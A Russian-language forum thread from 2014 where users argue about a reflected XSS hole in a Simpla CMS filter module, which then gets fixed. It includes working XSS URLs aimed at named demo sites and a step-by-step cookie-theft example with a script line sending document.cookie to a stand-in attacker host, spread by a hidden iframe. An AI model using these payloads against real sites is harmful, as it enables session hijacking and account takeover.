cernos Опубликовано 15 апреля, 2014 Жалоба Поделиться Опубликовано 15 апреля, 2014 По модулю от sell-studio мультифильтр, я нашел БАГ XSS атака:http://simpla.sell-workshop.ru/filter/catalog/mobilnye-telefony?min_price=0&max_price=%22%3E%3Ca%20href=%22http://teplotorg.com.ua/%22%3E%D0%9C%D0%BE%D1%8F%20%D1%81%D1%81%D1%8B%D0%BB%D0%BA%D0%B0%3C/a%3E Обратите внимание на ссылку под фильтром цен Благодаря ему, можно вставлять любой HTML код на страницу, в т.ч. и ссылки, как утверждает автор: Денис, Вы сильно гордый, чтобы признать [0:03:26] Андрей Ли: что можете допустить ошибку [0:03:37] Андрей Ли: Смотрите [0:03:40] Андрей Ли: ОШИБКУ СВОЮ [0:03:46] Андрей Ли: http://simpla.sell-workshop.ru/filter/catalog/mobilnye-telefony?min_price=0&max_price=0%22%3E%3Cinput%20type=%22text%22%20value=%22%D0%AD%D0%A2%D0%9E%20%D0%9D%D0%95%20%D0%91%D0%90%D0%93%20%D0%9D%D0%90%D0%92%D0%95%D0%A0%D0%9D%D0%9E%D0%95%22%20style=%22position:absolute;width:500px%20!important;height:500px;font-size:30px%22%3E [0:03:53] Андрей Ли: Если считаете что это не баг [0:04:00] Андрей Ли: то увы я умываю руки сударь [0:04:07] sell-studio: ахахахаха [0:04:15] Андрей Ли: xss это ахахаха? [0:04:21] sell-studio: вот как раз это не баг [0:04:28] Андрей Ли: [0:04:40] Андрей Ли: ТОбишь это нормально, что я могу менять содержимое вашей страницы? [0:04:45] sell-studio: так вы уж определитесь что это инекция мускула или xss [0:04:56] Андрей Ли: XSS это по вашему ерунда? [0:06:15] sell-studio: вывод html тего возмоожен на многих крупных сайтах ну это так не чего [0:06:30] Андрей Ли: Денис, вы заблуждаетесь [0:06:58] Андрей Ли: это XSS с помощью котороо я могу вставить свою ссылку на сайт и она будет внешней, таким образом многие сайты ушатали Как вы считаете? Это БАГ достойный внимания или все таки ерунда... ? Цитата Ссылка на сообщение Поделиться на другие сайты
osben Опубликовано 15 апреля, 2014 Жалоба Поделиться Опубликовано 15 апреля, 2014 sell-studio кто такие ? они бы что свое придумали А про баг, да. Увы так бывает даже у опытных прогеров - недостаточная фильтрация данных, но после предъявления бага становится ясно, кто есть кто (школота или добросовестный человек ) Цитата Ссылка на сообщение Поделиться на другие сайты
cernos Опубликовано 15 апреля, 2014 Автор Жалоба Поделиться Опубликовано 15 апреля, 2014 Osben Вашего модуля фильтра ajax это тоже касается ; ) Цитата Ссылка на сообщение Поделиться на другие сайты
cernos Опубликовано 15 апреля, 2014 Автор Жалоба Поделиться Опубликовано 15 апреля, 2014 sell-studio кто такие ? они бы что свое придумали А про баг, да. Увы так бывает даже у опытных прогеров - недостаточная фильтрация данных, но после предъявления бага становится ясно, кто есть кто (школота или добросовестный человек )Подставте в свой модуль фильтра в адресную строку: ?min_price=&max_price=">ТРУЛЯЛЯЛЯЛЯ<input%20type="hidden" Цитата Ссылка на сообщение Поделиться на другие сайты
cernos Опубликовано 15 апреля, 2014 Автор Жалоба Поделиться Опубликовано 15 апреля, 2014 К сожалению, этому мало кто уделяет внимание, а ведь ворованные куки и сессия может дать доступ в админ часть интернет-магазина ; ) Цитата Ссылка на сообщение Поделиться на другие сайты
osben Опубликовано 15 апреля, 2014 Жалоба Поделиться Опубликовано 15 апреля, 2014 Подставте в свой модуль фильтра в адресную строку: ?min_price=&max_price=">ТРУЛЯЛЯЛЯЛЯ<input%20type="hidden"да, там проверки не хватает в шаблоне. На последних проектах ето было исправленно, а демке решил сейчас исправить. А может парни из селл-студиа мою работу и спионерили ? часть так точно спионерели, скорее всего и пхп код, но судя по всему старую версию (там где мне самому не нравился код ) Цитата Ссылка на сообщение Поделиться на другие сайты
sell-studio Опубликовано 15 апреля, 2014 Жалоба Поделиться Опубликовано 15 апреля, 2014 obsen глубоко ошибаетесь... Фильтрация стояла на get но не отрабатывала... Своё придумали?Узнаёте http://www.21vek.by/washing_machines/ Вашего тут только ajax да и то он даже не ваш. Впервые термин AJAX был публично использован 18 февраля 2005 года в статье Джесси Джеймса Гарретта (Jesse James Garrett) «Новый подход к веб-приложениям»[3]. Гарретт придумал термин, когда ему пришлось как-то назвать новый набор технологий, предлагаемый им клиенту.Однако в той или иной форме многие технологии были доступны ииспользовались гораздо раньше, например в подходе «Remote Scripting»,предложенном компанией Microsoft в 1998 году, или с использованием HTML элемента IFRAME, появившегося в Internet Explorer 3 в 1996 году.AJAX стал особенно популярен после использования его компанией Google в сервисах Gmail, Google Maps и Google Suggest. P.S. всем мира Цитата Ссылка на сообщение Поделиться на другие сайты
osben Опубликовано 16 апреля, 2014 Жалоба Поделиться Опубликовано 16 апреля, 2014 "Фильтрация стояла на get но не отрабатывала..." - если стояла значит обрабатывать должно, если не стояла значит не обрабатывает.Вас как то не понимаю. Может Вы имели ввиду что в View вы проверяте параметры на integer для того что добавить в $filter['max_price'] но при етом в tpl Вы используете $smarty.get.max_price ? Про диз я Вам нечего не говорил, а вот то что часть js спионерили, а не AJAX который придумал Джесси Цитата Ссылка на сообщение Поделиться на другие сайты
yr4ik Опубликовано 16 апреля, 2014 Жалоба Поделиться Опубликовано 16 апреля, 2014 Это не баг. Такое можно сделать с любым html кодом с помощью оперы. http://ybex.com/d/jufj66b9zlaz3ybvc96eu7y7z6z6i7mzuauq6koe.html Вопрос заключается только в том как обрабатываются эти запросы на сервере.Если просто прямо идут как строка в запрос к БД. То это уже уязвимость... Можно делать SQL иньекции Цитата Ссылка на сообщение Поделиться на другие сайты
sell-studio Опубликовано 16 апреля, 2014 Жалоба Поделиться Опубликовано 16 апреля, 2014 на серверной части всё правильно обрабатывается Цитата Ссылка на сообщение Поделиться на другие сайты
Wizard Опубликовано 16 апреля, 2014 Жалоба Поделиться Опубликовано 16 апреля, 2014 чет я сомневаюсь что подобными манипуляциями можно вставить что то в базу. зачем мучатся со всякими ссылками, манипуляциями - цель ведь в том что бы поглумиться. Ну так сделайте себе скриншот чужого сайта и нарисуйте там чего хотите если это приводит вас к экстазу))) так ведь далеко пойти можноhttp://demo.simplacms.ru/catalog/miksery?2=%22%3E%3Ca%20href=%22http://teplotorg.com.ua/%22%3E%D0%9C%D0%BE%D1%8F%20%D1%81%D1%81%D1%8B%D0%BB%D0%BA%D0%B0%3C/a%3E http://demo.simplacms.ru/catalog/miksery?2=%22%3E%EC%EE%FF%20%F1%F1%FB%EB%EA%E0%3C%22 Цитата Ссылка на сообщение Поделиться на другие сайты
cernos Опубликовано 16 апреля, 2014 Автор Жалоба Поделиться Опубликовано 16 апреля, 2014 чет я сомневаюсь что подобными манипуляциями можно вставить что то в базу. зачем мучатся со всякими ссылками, манипуляциями - цель ведь в том что бы поглумиться. Ну так сделайте себе скриншот чужого сайта и нарисуйте там чего хотите если это приводит вас к экстазу))) так ведь далеко пойти можно.... Вам наверное не знаком термин "xss атака" и её возможные последствия. Цитата Ссылка на сообщение Поделиться на другие сайты
Wizard Опубликовано 16 апреля, 2014 Жалоба Поделиться Опубликовано 16 апреля, 2014 а вы продемонстрируйте, что бы было понятнее. вот есть сайт simpla.sell-workshop.ru вы ЗНАТОК xss атак - вот и продемонстрируйте возможности Цитата Ссылка на сообщение Поделиться на другие сайты
Wizard Опубликовано 16 апреля, 2014 Жалоба Поделиться Опубликовано 16 апреля, 2014 [0:04:40] Андрей Ли: ТОбишь это нормально, что я могу менять содержимое вашей страницы?[0:04:45] sell-studio: так вы уж определитесь что это инекция мускула или xss Для того что бы менять содержимое надо воткнуть свой хлам в базу. Вы и сами то не знаете что хотите сделать подменить содержимое или продемонстрировать xss. Что вы можете менять? Какое содержимое? Относительно своего браузера меняйте что хотите...[0:06:58] Андрей Ли: это XSS с помощью котороо я могу вставить свою ссылку на сайт и она будет внешней, таким образом многие сайты ушатали Какие сайты? Можно примеры? Как ушатали, что за сайты? Вы подняли тему, решили просветить форумчан, ознакомить с термином "xss атака". Но пока мне объективно видно что кроме термина вы не показали ничего серьезного. Ничего серьезного в детской забаве которую вы продемонстрировали лично я не увидел. вот впишите в индексный файл свое содержимое или добавьте в базу что либо посредством той дыры которую обнаружили, тогда я с вами соглашусь... Цитата Ссылка на сообщение Поделиться на другие сайты
cernos Опубликовано 16 апреля, 2014 Автор Жалоба Поделиться Опубликовано 16 апреля, 2014 Благодаря xss я могу получить доступ к админ панели магазина к примеру, заполучив ваши куки и сессию! Или это фигня по вашему? Цитата Ссылка на сообщение Поделиться на другие сайты
Wizard Опубликовано 16 апреля, 2014 Жалоба Поделиться Опубликовано 16 апреля, 2014 Благодаря xss я могу получить доступ к админ панели магазина к примеру, заполучив ваши куки и сессию! Или это фигня по вашему? продемонстрируйте, потом поговорим фигня это или нет Цитата Ссылка на сообщение Поделиться на другие сайты
cernos Опубликовано 16 апреля, 2014 Автор Жалоба Поделиться Опубликовано 16 апреля, 2014 Wizard откройте Google поищите что такое XSS, и что с помощью него можно сделать и как это делается. Почему я должен Вас учить или разъяснять? Цитата Ссылка на сообщение Поделиться на другие сайты
Kosjak76 Опубликовано 16 апреля, 2014 Жалоба Поделиться Опубликовано 16 апреля, 2014 По-моему, вам пытаются намекнуть, что подставить джаваскриптом что-то из инпута на страницу, и провести атаку - немного разные вещи... Цитата Ссылка на сообщение Поделиться на другие сайты
cernos Опубликовано 16 апреля, 2014 Автор Жалоба Поделиться Опубликовано 16 апреля, 2014 Модератор закрой тему. Вопрос решился. Баг исправили. Объяснять кому либо, что такое xss, как им пользоваться и его последствия я не намерен, для этого есть статьи, к примеру здесь: http://blackhack.ru/showthread.php?t=178 Цитата Ссылка на сообщение Поделиться на другие сайты
yr4ik Опубликовано 16 апреля, 2014 Жалоба Поделиться Опубликовано 16 апреля, 2014 cernos я например знаю что такое XSS атака. Я еще в школе участвовал в хаке 1 форума по данному принципу.То что вы навели - это не страшно и особого вреда не нанесет. Таких мест в коде любой кмс может быть навалом.Это может быть опасно только в одном случае: если вы сгенерируете ссылку при заходе на какую откроется что то типа окна ввода логина и пароля. Затем нужно что бы администратор (жертва) прошел по данной ссылке и ошибшись ввел свои данные которые в свою очередь передались на ваш сервер. Но тут еще есть ограничения на длину GET (примерно 256-1024байт) то есть не факт что все что нужно сюда влезет... Существует намного проще способ для данного действия. Делается через обычный смайлик, в какой нибудь форме для коммента например (но это при учете что допускается дальнейший вывод изображений с сообщений) Цитата Ссылка на сообщение Поделиться на другие сайты
aimatrix Опубликовано 17 апреля, 2014 Жалоба Поделиться Опубликовано 17 апреля, 2014 # osben Увы так бывает даже у опытных прогеровЭто точно. Все мы люди, от такого не застрахованы ни супер опытные, ни начинающие. Как и не может быть абсолютно неуязвимой CMS, человеческий фактор когда-нибудь выплывет.# yr4ik Это не баг. Такое можно сделать с любым html кодом с помощью оперы. ...ybex.com/d/ju...mzuauq6koe.html Вопрос заключается только в том как обрабатываются эти запросы на сервере.Вопрос в том, как уязвимость будет использована атакующим. Я вижу как минимум 4 способа. Специалист по безопасности наверняка назовет еще несколько, о которых мы даже не подумали бы.# Wizard чет я сомневаюсь что подобными манипуляциями можно вставить что то в базуНе сомневайтесь, можно. Главное здесь - глубокое знание принципов атаки и умение мыслить глобальнее, чем рядовые программисты.# Wizard Ничего серьезного в детской забаве которую вы продемонстрировали лично я не увидел.Если к теме безопасности вы не имеете отношения, конечно ничего не увидите. Для этого надо быть в теме.# yr4ik Это может быть опасно только в одном случае: если вы сгенерируете ссылку при заходе на какую откроется что то типа окна ввода логина и пароля.Это может быть опасно как минимум в 4 случаях: стандартная кража куков, кража ТИЦ, атака на выброс конкурента из индекса, атака на исполнение скриптов от имени админа. ------------------------------- P.S. Наблюдение. Симпла - легкий движок, удобный для начинающих. Однако ее же легкость играет злую шутку в виде вовлечения в среду разработки большого процента посредственных специалистов. Скажем так, проблема эта известна всем движкам, но в Симпле она весьма заметна. В итоге к природным уязвимостям движка прибавляется масса дырок, опасных и не очень, заметных и затаившихся, порожденных этими специалистами. Если уж ошибка замечена, лучше исправить, потому что ваших знаний вряд ли хватит, тем более в сфере безопасности, чтобы рассуждать о возможных последствиях ошибки. Цитата Ссылка на сообщение Поделиться на другие сайты
pikusov Опубликовано 17 апреля, 2014 Жалоба Поделиться Опубликовано 17 апреля, 2014 Исправлено Цитата Ссылка на сообщение Поделиться на другие сайты
Wizard Опубликовано 17 апреля, 2014 Жалоба Поделиться Опубликовано 17 апреля, 2014 cernos: Благодаря xss я могу получить доступ к админ панели магазина к примеру, заполучив ваши куки и сессию! Или это фигня по вашему? Wizard: продемонстрируйте, потом поговорим фигня это или нет cernos: Wizard откройте Google поищите что такое XSS, и что с помощью него можно сделать и как это делается. Почему я должен Вас учить или разъяснять? cernos вы сами взялись учить и разъяснять, иначе для чего вы подняли эту тему. Мне искренне интересно как злоумышленники могут навредить сайту и как с этим бороться, я подумал что вы специалист, вот думаю ща научит и покажет что к чему. Вы никому ничего не должны, вы просто пустозвон... Вы можете задавать вопросы по поводу безопасности в которой сами ничего не смыслите. aimatrix: Не сомневайтесь, можно. Главное здесь - глубокое знание принципов атаки и умение мыслить глобальнее, чем рядовые программисты. Можно и сайт пентагона взломать Вопрос в том, что оговаривается какая то проблема, но реальных примеров НЕТ. Для того что бы квалифицированно вести речь о безопасности необходимо в этом хоть образно что то понимать или как минимум что бы тут присутствовал хоть один специалист который мог бы внятно объяснить на примерах что к чему, погуглить не достаточно. на данный момент, лично для меня, поднятая "проблема" до сих пор остается всего лишь детской шалостью. Вот Денис (pikusov) исправил тот МЕГА баг который нашелся в ходе нашей дискуссии. Может он объяснит как можно навредить сайту посредством данной уязвимости или как минимум КАКИЕ ЖЕ ВСЕ ТАКИЕ последствия ждут пользователей у которых более ранняя версия. Цитата Ссылка на сообщение Поделиться на другие сайты
Wizard Опубликовано 17 апреля, 2014 Жалоба Поделиться Опубликовано 17 апреля, 2014 Если уж ошибка замечена, лучше исправить, потому что ваших знаний вряд ли хватит, тем более в сфере безопасности, чтобы рассуждать о возможных последствиях ошибки. Так если у посредственных специалистов не достаточно знаний в сфере безопасности как они могут знать об ошибках которые приведут к взлому для того что бы их предотвратить))))))))))))) Вы рассуждаете не о безопасности - это ПАРАНОЯ В вашем коде, в ранней версии, сейчас не знаю, я вообще видел защиту от DDOS!!!! Защита от DDOS на уровне PHP!!! это нонсенс!! Совсем не удевительно что вас заинтересовала данная тема. PS:Посредственных программистов, верстальщиков, дизайнеров и обычных пустозвонов достаточно везде, дело не в cms. Симпла УНИКАЛЬНАЯ CMS с простым, логичным кодом - она подойдет как для крутого специалиста так и для рядового пользователя. Вопрос только в целях и задачах. Ничего лучше в данном сегменте нет. Цитата Ссылка на сообщение Поделиться на другие сайты
pikusov Опубликовано 17 апреля, 2014 Жалоба Поделиться Опубликовано 17 апреля, 2014 cernos: Благодаря xss я могу получить доступ к админ панели магазина к примеру, заполучив ваши куки и сессию! Или это фигня по вашему? Wizard: продемонстрируйте, потом поговорим фигня это или нет cernos: Wizard откройте Google поищите что такое XSS, и что с помощью него можно сделать и как это делается. Почему я должен Вас учить или разъяснять? cernos вы сами взялись учить и разъяснять, иначе для чего вы подняли эту тему. Мне искренне интересно как злоумышленники могут навредить сайту и как с этим бороться, я подумал что вы специалист, вот думаю ща научит и покажет что к чему. Вы никому ничего не должны, вы просто пустозвон... Вы можете задавать вопросы по поводу безопасности в которой сами ничего не смыслите. aimatrix: Не сомневайтесь, можно. Главное здесь - глубокое знание принципов атаки и умение мыслить глобальнее, чем рядовые программисты. Можно и сайт пентагона взломать Вопрос в том, что оговаривается какая то проблема, но реальных примеров НЕТ. Для того что бы квалифицированно вести речь о безопасности необходимо в этом хоть образно что то понимать или как минимум что бы тут присутствовал хоть один специалист который мог бы внятно объяснить на примерах что к чему, погуглить не достаточно. на данный момент, лично для меня, поднятая "проблема" до сих пор остается всего лишь детской шалостью. Вот Денис (pikusov) исправил тот МЕГА баг который нашелся в ходе нашей дискуссии. Может он объяснит как можно навредить сайту посредством данной уязвимости или как минимум КАКИЕ ЖЕ ВСЕ ТАКИЕ последствия ждут пользователей у которых более ранняя версия. Баг, который был в симпле, не критичен, как тот, который был в модуле, с которого начался разговор. Так как в симпле баг случается только в редких случаях (PHP < 5.3, включены ворнинги) а так же не позволял добавить скрипт на страницу.А в модуле баг был действительно критичный, и продемонстрировать его я даже собирался на живом примере специально для вас, но баг уже исправили, так что опишу пример словами:1) указываем в URL такие данные, чтобы на страницу сайта добавился примерно такой код: <script>document.write("myhackersite.com/savecookies.php?cookie=" + document.cookies );</script>2) Эту ссылку отправляем жертве, чьи куки хотим украсть. Чтобы не палиться, можем создать фейковую страницу "с веселыми котиками", в скрытом фрейме указав этот адрес.3) Как только жертва откроет эту ссылку, наш php-скрипит из первого пункта получит её куки и отправит их нам, например, на email4) Заходим под куками жертвы в магазин, и мы оказываемся залогинены под ним. Конечно, в данном случае, максимум, чем мы можем навредить жертве, это посмотреть историю его заказов, просмотров товаров и состояние корзины, но всё-равно неприятно. Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.